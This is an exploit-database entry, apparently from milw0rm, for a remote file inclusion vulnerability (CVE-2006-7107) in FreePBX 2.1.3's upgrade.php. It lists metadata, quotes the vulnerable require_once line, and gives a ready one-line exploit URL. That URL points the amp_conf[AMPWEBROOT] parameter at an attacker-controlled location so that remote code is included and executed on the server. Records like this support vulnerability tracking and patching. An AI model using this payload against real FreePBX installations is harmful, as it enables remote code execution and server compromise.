[] NeoSense

FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion

Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2006-10-27 
date_updated: 2016-10-22 
verified: 1 
codes: OSVDB-34694;CVE-2006-7107 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfreepbx-2.1.3.tgz

Script: freePBX
Version: v2.1.3
Script Download: http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# milw0rm.com [2006-10-28]